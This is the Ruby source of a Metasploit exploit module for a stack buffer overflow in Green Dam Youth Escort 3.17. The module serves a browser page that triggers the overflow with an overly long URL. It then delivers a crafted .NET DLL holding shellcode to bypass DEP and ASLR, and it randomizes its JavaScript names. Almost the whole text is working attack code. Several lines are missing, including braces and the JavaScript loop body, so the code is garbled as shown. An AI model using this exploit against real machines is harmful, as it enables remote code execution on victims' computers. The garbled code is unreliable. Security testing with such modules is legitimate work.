# $Id: greendam_url.rb 8762 2010-03-10 05:58:01Z jduck $
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
# greendam_url.rb
# Green Dam URL Processing Buffer Overflow exploit for the Metasploit Framework
# Green Dam Youth Escort 3.17 successfully exploited on the following platforms:
#- Internet Explorer 6, Windows XP SP2
#- Internet Explorer 7, Windows XP SP3
#- Internet Explorer 7, Windows Vista SP1
# .NET binary is used to bypass DEP and ASLR
# Trancer
# http://www.rec-sec.com
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
'Name' => 'Green Dam URL Processing Buffer Overflow',
'Description'=> %q{
This module exploits a stack-based buffer overflow in Green Dam Youth Escort
version 3.17 in the way it handles overly long URLs.
By setting an overly long URL, an attacker can overrun a buffer and execute
arbitrary code. This module uses the .NET DLL memory technique by Alexander
Sotirov and Mark Dowd and should bypass DEP, NX and ASLR.
'License'=> MSF_LICENSE,
'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ],
'Version'=> '$Revision: 8762 $',
'References' =>
['OSVDB', '55126'],
['URL', 'http://www.cse.umich.edu/~jhalderm/pub/gd/'], # Analysis of the Green Dam Censorware System
['URL', 'http://www.milw0rm.com/exploits/8938'], # Original exploit by seer[N.N.U]
['URL', 'http://taossa.com/archive/bh08sotirovdowd.pdf'], # .NET DLL memory technique
'DefaultOptions' =>
'EXITFUNC' => 'process',
'Space'=> 1000,
'BadChars' => "\x00",
'Compat' =>
'ConnectionType' => '-find',
'StackAdjustment' => -3500,
# Temporary stub virtualalloc() + memcpy() payload to RWX page
'PrependEncoder' =>
'Platform' => 'win',
[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { }],
'DisclosureDate' => 'Jun 11 2009',
'DefaultTarget'=> 0))
def on_request_uri(cli, request)
ibase = 0x24240000
vaddr = ibase + 0x2065
if (request.uri.match(/\.dll$/i))
print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")
return if ((p = regenerate_payload(cli)) == nil)
# First entry points to the table of pointers
vtable= [ vaddr + 4 ].pack("V")
cbase = ibase + 0x2065 + (256 * 4)
# Build a function table
255.times { vtable << [cbase].pack("V") }
# Append the shellcode
vtable << p.encoded
Msf::Util::EXE.to_dotnetmem(ibase, vtable),
'Content-Type' => 'application/x-msdownload',
'Connection' => 'close',
'Pragma' => 'no-cache'
print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")
j_function = rand_text_alpha(rand(100)+1)
j_url = rand_text_alpha(rand(100)+1)
j_counter = rand_text_alpha(rand(30)+2)
if ("/" == get_resource[-1,1])
dll_uri = get_resource[0, get_resource.length - 1]
dll_uri = get_resource
dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"
html = %Q|<html>
<script language="javascript">
function #{j_function}() {
var #{j_url}='';
for(var #{j_counter}=1;#{j_counter}<=2035;#{j_counter}++)
<body onload="#{j_function}()">
<object classid="#{dll_uri}#GenericControl">
# Transmit the compressed response to the client
send_response(cli, html, { 'Content-Type' => 'text/html' })
# Handle the payload